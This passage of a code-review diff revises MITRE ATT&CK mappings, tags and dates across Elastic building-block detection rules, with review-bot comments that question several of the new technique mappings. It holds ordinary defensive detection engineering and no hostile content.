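Review bot: The new first `[[rule.threat]]` entry maps this rule to T1562 Impair Defenses under Defense Evasion, but the query context in the hunk header (`file.path : ("/etc/sysctl.conf" or "/etc/sysctl.d" or /etc/sysctl.d/*)`) is a path match on kernel-parameter configuration and the rule is still an enumeration rule by name; reading sysctl settings is discovery, whereas Impair Defenses implies they are being modified. Unless the query is restricted to write or modify events (not visible here), the T1562 entry overstates what the rule observes, and the Discovery entry with the newly added T1083 stands on its own. If the Defense Evasion mapping is kept, it should be backed by a modification condition in the query rather than by the tag and tactic table alone.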
@@ -2,7 +2,7 @@ creation_date = "2023/07/10" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -50,11 +50,15 @@ id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" +[[rule.threat.technique.subtechnique]] +id = "T1069.001" +name = "Local Groups" +reference = "https://attack.mitre.org/techniques/T1069/001/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable", "process.command_line", "host.id"] diff --git a/rules_building_block/discovery_net_share_discovery_winlog.toml b/rules_building_block/discovery_net_share_discovery_winlog.toml index 4d83aa90687..6face7dc939 100644 --- a/rules_building_block/discovery_net_share_discovery_winlog.toml +++ b/rules_building_block/discovery_net_share_discovery_winlog.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/14" integration = ["windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -20,15 +20,7 @@ name = "Potential Network Share Discovery" risk_score = 21 rule_id = "b2318c71-5959-469a-a3ce-3a0768e63b9c" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Collection", - "Rule Type: BBR", - "Data Source: Windows Security Event Logs", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: BBR", "Tactic: Discovery", "Data Source: Windows Security Event Logs"] type = "eql" query = ''' 
@@ -44,26 +36,13 @@ sequence by user.name, source.port, source.ip with maxspan=15s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1135" name = "Network Share Discovery" reference = "https://attack.mitre.org/techniques/T1135/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1039" -name = "Data from Network Shared Drive" -reference = "https://attack.mitre.org/techniques/T1039/" - - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - diff --git a/rules_building_block/discovery_net_view.toml b/rules_building_block/discovery_net_view.toml index 196586ddc82..abbd287678c 100644 --- a/rules_building_block/discovery_net_view.toml +++ b/rules_building_block/discovery_net_view.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/12/04" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -56,17 +56,7 @@ Hence for this rule to work effectively, users will need to add a custom ingest For more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Collection", - "Resources: Investigation Guide", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "eql" 
@@ -91,6 +81,7 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1018" name = "Remote System Discovery" @@ -101,21 +92,7 @@ id = "T1135" name = "Network Share Discovery" reference = "https://attack.mitre.org/techniques/T1135/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1039" -name = "Data from Network Shared Drive" -reference = "https://attack.mitre.org/techniques/T1039/" - - -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - diff --git a/rules_building_block/discovery_of_domain_groups.toml b/rules_building_block/discovery_of_domain_groups.toml index c64491dcc33..491bfd23563 100644 --- a/rules_building_block/discovery_of_domain_groups.toml +++ b/rules_building_block/discovery_of_domain_groups.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "auditd_manager", "crowdstrike"] maturity = "production" -updated_date = "2025/10/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -44,14 +44,18 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules_building_block/discovery_posh_generic.toml b/rules_building_block/discovery_posh_generic.toml index d25af55f2b8..ca32bc8cca0 100644 --- a/rules_building_block/discovery_posh_generic.toml 
+++ b/rules_building_block/discovery_posh_generic.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/06" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -25,15 +25,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Collection", - "Tactic: Discovery", - "Data Source: PowerShell Logs", - "Rule Type: BBR", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: PowerShell Logs", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "query" @@ -201,6 +193,7 @@ value = "?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender Advanced Threat Prot [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1007" name = "System Service Discovery" @@ -211,6 +204,11 @@ id = "T1012" name = "Query Registry" reference = "https://attack.mitre.org/techniques/T1012/" +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + [[rule.threat.technique]] id = "T1049" name = "System Network Connections Discovery" 
@@ -222,24 +220,25 @@ name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" [[rule.threat.technique]] id = "T1082" name = "System Information Discovery" reference = "https://attack.mitre.org/techniques/T1082/" -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" - [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" + [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" @@ -250,7 +249,6 @@ id = "T1087.002" name = "Domain Account" reference = "https://attack.mitre.org/techniques/T1087/002/" - [[rule.threat.technique]] id = "T1135" name = "Network Share Discovery" 
@@ -270,37 +268,18 @@ reference = "https://attack.mitre.org/techniques/T1482/" id = "T1518" name = "Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/" + [[rule.threat.technique.subtechnique]] id = "T1518.001" name = "Security Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/001/" - [[rule.threat.technique]] id = "T1615" name = "Group Policy Discovery" reference = "https://attack.mitre.org/techniques/T1615/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules_building_block/discovery_posh_password_policy.toml b/rules_building_block/discovery_posh_password_policy.toml index fe12f739745..7b517268c32 100644 --- a/rules_building_block/discovery_posh_password_policy.toml +++ b/rules_building_block/discovery_posh_password_policy.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/12" integration = ["windows"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -88,16 +88,7 @@ PowerShell Script Block Logging must be enabled to generate the events used by t Setup instructions: https://ela.st/powershell-logging-setup """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Discovery", - "Tactic: Execution", - "Data Source: PowerShell Logs", - "Rule Type: BBR", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Discovery", "Data Source: PowerShell Logs", "Rule Type: BBR", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -142,34 +133,16 @@ not user.id : "S-1-5-18" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1201" name = "Password Policy Discovery" reference = "https://attack.mitre.org/techniques/T1201/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules_building_block/discovery_post_exploitation_external_ip_lookup.toml b/rules_building_block/discovery_post_exploitation_external_ip_lookup.toml index ca94235feb2..b27f77bdb79 100644 --- a/rules_building_block/discovery_post_exploitation_external_ip_lookup.toml +++ b/rules_building_block/discovery_post_exploitation_external_ip_lookup.toml 
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/09/04" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -133,24 +133,18 @@ network where host.os.type == "windows" and network.protocol == "dns" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1016" name = "System Network Configuration Discovery" reference = "https://attack.mitre.org/techniques/T1016/" + [[rule.threat.technique.subtechnique]] id = "T1016.001" name = "Internet Connection Discovery" reference = "https://attack.mitre.org/techniques/T1016/001/" - -[[rule.threat.technique]] -id = "T1614" -name = "System Location Discovery" -reference = "https://attack.mitre.org/techniques/T1614/" - - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules_building_block/discovery_potential_memory_seeking_activity.toml b/rules_building_block/discovery_potential_memory_seeking_activity.toml index 1296b79194d..35696a3bf62 100644 --- a/rules_building_block/discovery_potential_memory_seeking_activity.toml +++ b/rules_building_block/discovery_potential_memory_seeking_activity.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/02/01" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -58,15 +58,3 @@ process where host.os.type == "linux" and event.type == "start" and event.action ) ''' -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1057" -name = "Process Discovery" -reference = "https://attack.mitre.org/techniques/T1057/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" 
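Review bot: Removing the whole `[[rule.threat]]` table leaves `discovery_potential_memory_seeking_activity.toml` with no ATT&CK mapping at all, and this file has no `tags` hunk in the patch, so any `Tactic: Discovery` tag it still carries would now have no backing threat entry. If the intent is that the rule no longer claims Process Discovery, the tag (and arguably the `discovery_` file prefix) should change in the same commit; otherwise keep the T1057 / TA0007 entry, which is the only mapping the rule had.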
diff --git a/rules_building_block/discovery_process_discovery_via_builtin_tools.toml b/rules_building_block/discovery_process_discovery_via_builtin_tools.toml index 8b0c1ba8a90..c11eb222786 100644 --- a/rules_building_block/discovery_process_discovery_via_builtin_tools.toml +++ b/rules_building_block/discovery_process_discovery_via_builtin_tools.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -51,21 +51,10 @@ id = "T1057" name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" -[[rule.threat.technique]] -id = "T1518" -name = "Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/" - -[[rule.threat.technique.subtechnique]] -id = "T1518.001" -name = "Security Software Discovery" -reference = "https://attack.mitre.org/techniques/T1518/001/" - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable", "process.command_line", "host.id"] diff --git a/rules_building_block/discovery_remote_system_discovery_commands_windows.toml b/rules_building_block/discovery_remote_system_discovery_commands_windows.toml index 49272de507f..6efa2a5e64d 100644 --- a/rules_building_block/discovery_remote_system_discovery_commands_windows.toml +++ b/rules_building_block/discovery_remote_system_discovery_commands_windows.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/12/04" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,6 +93,7 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1016" name = "System Network Configuration Discovery" 
@@ -103,9 +104,17 @@ id = "T1018" name = "Remote System Discovery" reference = "https://attack.mitre.org/techniques/T1018/" +[[rule.threat.technique]] +id = "T1069" +name = "Permission Groups Discovery" +reference = "https://attack.mitre.org/techniques/T1069/" + +[[rule.threat.technique.subtechnique]] +id = "T1069.002" +name = "Domain Groups" +reference = "https://attack.mitre.org/techniques/T1069/002/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules_building_block/discovery_security_software_wmic.toml b/rules_building_block/discovery_security_software_wmic.toml index ace9b215e1b..cc4036d6568 100644 --- a/rules_building_block/discovery_security_software_wmic.toml +++ b/rules_building_block/discovery_security_software_wmic.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2020/10/19" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -77,31 +77,18 @@ process.args : "/namespace:\\\\root\\SecurityCenter2" and process.args : "Get" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1518" name = "Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/" + [[rule.threat.technique.subtechnique]] id = "T1518.001" name = "Security Software Discovery" reference = "https://attack.mitre.org/techniques/T1518/001/" - - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1047" -name = "Windows Management Instrumentation" -reference = "https://attack.mitre.org/techniques/T1047/" - - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - 
diff --git a/rules_building_block/discovery_suspicious_proc_enumeration.toml b/rules_building_block/discovery_suspicious_proc_enumeration.toml index 5416dfa0a22..ecbdf328a3a 100644 --- a/rules_building_block/discovery_suspicious_proc_enumeration.toml +++ b/rules_building_block/discovery_suspicious_proc_enumeration.toml @@ -2,7 +2,7 @@ creation_date = "2023/06/09" integration = ["auditd_manager"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,22 +62,16 @@ file.path : (/proc/*/cmdline or /proc/*/stat or /proc/*/exe) and not process.nam [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1057" name = "Process Discovery" reference = "https://attack.mitre.org/techniques/T1057/" -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" - - [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.threshold] field = ["host.id", "process.pid", "process.name"] value = 1 diff --git a/rules_building_block/discovery_system_network_connections.toml b/rules_building_block/discovery_system_network_connections.toml index b226cb4c1aa..64bbd52e576 100644 --- a/rules_building_block/discovery_system_network_connections.toml +++ b/rules_building_block/discovery_system_network_connections.toml @@ -2,7 +2,7 @@ creation_date = "2023/07/11" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -45,6 +45,11 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + [[rule.threat.technique]] id = "T1049" name = "System Network Connections Discovery" 
@@ -54,7 +59,6 @@ reference = "https://attack.mitre.org/techniques/T1049/" id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - [rule.new_terms] field = "new_terms_fields" value = ["process.parent.executable", "process.command_line", "host.id"] diff --git a/rules_building_block/discovery_system_service_discovery.toml b/rules_building_block/discovery_system_service_discovery.toml index 4810cc175fd..1f8c79219de 100644 --- a/rules_building_block/discovery_system_service_discovery.toml +++ b/rules_building_block/discovery_system_service_discovery.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/01/24" integration = ["windows", "endpoint", "system"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -70,14 +70,18 @@ process where host.os.type == "windows" and event.type == "start" and process.pa [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1007" name = "System Service Discovery" reference = "https://attack.mitre.org/techniques/T1007/" +[[rule.threat.technique]] +id = "T1135" +name = "Network Share Discovery" +reference = "https://attack.mitre.org/techniques/T1135/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules_building_block/discovery_win_network_connections.toml b/rules_building_block/discovery_win_network_connections.toml index dc1f9d25751..6fd29c4a0e4 100644 --- a/rules_building_block/discovery_win_network_connections.toml +++ b/rules_building_block/discovery_win_network_connections.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/07/14" integration = ["endpoint"] maturity = "production" -updated_date = "2024/05/21" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -52,19 +52,28 @@ process where event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + [[rule.threat.technique]] id = "T1049" name = "System Network Connections Discovery" reference = "https://attack.mitre.org/techniques/T1049/" [[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" +id = "T1087" +name = "Account Discovery" +reference = "https://attack.mitre.org/techniques/T1087/" +[[rule.threat.technique]] +id = "T1135" +name = "Network Share Discovery" +reference = "https://attack.mitre.org/techniques/T1135/" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" - diff --git a/rules_building_block/entra_id_identity_protection_risk_detections.toml b/rules_building_block/entra_id_identity_protection_risk_detections.toml index ba23d68e913..d1a6a5ecaf6 100644 --- a/rules_building_block/entra_id_identity_protection_risk_detections.toml +++ b/rules_building_block/entra_id_identity_protection_risk_detections.toml @@ -4,7 +4,7 @@ creation_date = "2025/05/18" integration = ["azure"] maturity = "production" promotion = true -updated_date = "2025/12/10" +updated_date = "2026/03/23" [rule] author = ["Elastic"] 
@@ -29,16 +29,7 @@ risk_score = 47 rule_id = "da0d4bae-33ee-11f0-a59f-f661ea17fbcd" setup = "" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Protection", - "Data Source: Microsoft Entra ID Protection Logs", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Rule Type: BBR", -] +tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Protection", "Data Source: Microsoft Entra ID Protection Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "query" @@ -46,3 +37,38 @@ query = ''' event.dataset: "azure.identity_protection" ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1110" +name = "Brute Force" +reference = "https://attack.mitre.org/techniques/T1110/" + +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules_building_block/execution_aws_lambda_function_updated.toml b/rules_building_block/execution_aws_lambda_function_updated.toml index 773ea2fdede..a6e9fa6842e 100644 --- a/rules_building_block/execution_aws_lambda_function_updated.toml 
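Review bot: The added Credential Access entry pins this rule to T1110.003 Password Spraying, but the query shown in the hunk context is `event.dataset: "azure.identity_protection"` with no filter on the risk event type, so the rule fires on every Identity Protection risk detection, including those unrelated to brute force. Either narrow the query to the spray-related risk types before claiming that sub-technique, or keep the mapping at the level the data supports: the T1078.004 Cloud Accounts entry fits a generic risk signal, and the `Tactic: Credential Access` tag would be dropped with the T1110 entry.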
+++ b/rules_building_block/execution_aws_lambda_function_updated.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2024/04/20" integration = ["aws"] maturity = "production" -updated_date = "2024/09/01" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -36,15 +36,7 @@ references = [ risk_score = 21 rule_id = "1251b98a-ff45-11ee-89a1-f661ea17fbce" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS Lambda", - "Use Case: Asset Visibility", - "Tactic: Execution", - "Rule Type: BBR" -] +tags = ["Domain: Cloud", "Tactic: Execution", "Tactic: Persistence", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS Lambda", "Use Case: Asset Visibility", "Rule Type: BBR"] timestamp_override = "event.ingested" type = "query" @@ -58,14 +50,31 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1648" name = "Serverless Execution" reference = "https://attack.mitre.org/techniques/T1648/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.006" +name = "vSphere Installation Bundles" +reference = "https://attack.mitre.org/techniques/T1505/006/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules_building_block/execution_github_new_event_action_for_pat.toml b/rules_building_block/execution_github_new_event_action_for_pat.toml index 481941c1220..9f0a71e6543 100644 --- a/rules_building_block/execution_github_new_event_action_for_pat.toml +++ b/rules_building_block/execution_github_new_event_action_for_pat.toml 
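Review bot: The new Persistence entry maps an AWS Lambda function-update rule to T1505.006, whose name in the hunk is `vSphere Installation Bundles`, a VMware ESXi-specific sub-technique that cannot describe `aws.cloudtrail` events, so this looks like a mis-pick from the sub-technique list. Drop the `[[rule.threat.technique.subtechnique]]` table (`id = "T1505.006"`, `name = "vSphere Installation Bundles"`, `reference = "https://attack.mitre.org/techniques/T1505/006/"`) and keep the parent T1505 only if Server Software Component is really the intended persistence technique; otherwise the existing T1648 Serverless Execution entry already covers what the rule observes. The `Tactic: Persistence` tag added in the tags hunk has to be removed together with the entry if the entry goes.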
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -17,14 +17,7 @@ name = "First Occurrence GitHub Event for a Personal Access Token (PAT)" risk_score = 21 rule_id = "ce08b55a-f67d-4804-92b5-617b0fe5a5b5" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Use Case: UEBA", - "Tactic: Execution", - "Rule Type: BBR", - "Data Source: Github", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Persistence", "Data Source: Github"] timestamp_override = "event.ingested" type = "new_terms" @@ -37,17 +30,21 @@ github.programmatic_access_type:("OAuth access token" or "Fine-grained personal [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1648" -name = "Serverless Execution" -reference = "https://attack.mitre.org/techniques/T1648/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "event.action"] diff --git a/rules_building_block/execution_github_new_repo_interaction_for_pat.toml b/rules_building_block/execution_github_new_repo_interaction_for_pat.toml index cb75d586d8b..d214860a434 100644 --- a/rules_building_block/execution_github_new_repo_interaction_for_pat.toml +++ b/rules_building_block/execution_github_new_repo_interaction_for_pat.toml 
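Review bot: T1098.001 Additional Cloud Credentials describes an adversary adding credentials to an account, whereas this rule's `new_terms` fields (`github.hashed_token`, `event.action`, visible in the hunk) key on the first time an existing token performs a given action, which is token use rather than token creation. If the intent is to catch newly minted PATs, the query should match the token-creation audit action; if it is to catch unusual use of an existing token, a Persistence mapping via T1098.001 overstates the signal and a T1078-style Valid Accounts entry or a tactic-level entry would be more accurate. Either way the `Tactic: Persistence` tag added in the tags hunk must match whichever entry is kept.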
@@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2023/10/11" integration = ["github"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -17,14 +17,7 @@ name = "First Occurrence of Private Repo Event from Specific GitHub Personal Acc risk_score = 21 rule_id = "1e9b271c-8caa-4e20-aed8-e91e34de9283" severity = "low" -tags = [ - "Domain: Cloud", - "Use Case: Threat Detection", - "Use Case: UEBA", - "Tactic: Execution", - "Rule Type: BBR", - "Data Source: Github", -] +tags = ["Domain: Cloud", "Use Case: Threat Detection", "Use Case: UEBA", "Rule Type: BBR", "Tactic: Collection", "Data Source: Github"] timestamp_override = "event.ingested" type = "new_terms" @@ -38,17 +31,21 @@ github.repository_public:false [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1648" -name = "Serverless Execution" -reference = "https://attack.mitre.org/techniques/T1648/" +id = "T1213" +name = "Data from Information Repositories" +reference = "https://attack.mitre.org/techniques/T1213/" +[[rule.threat.technique.subtechnique]] +id = "T1213.003" +name = "Code Repositories" +reference = "https://attack.mitre.org/techniques/T1213/003/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" [rule.new_terms] field = "new_terms_fields" value = ["github.hashed_token", "github.repo"] diff --git a/rules_building_block/execution_github_new_repo_interaction_for_user.toml b/rules_building_block/execution_github_new_repo_interaction_for_user.toml index ba867350a28..50b57366d35 100644 --- a/rules_building_block/execution_github_new_repo_interaction_for_user.toml +++ 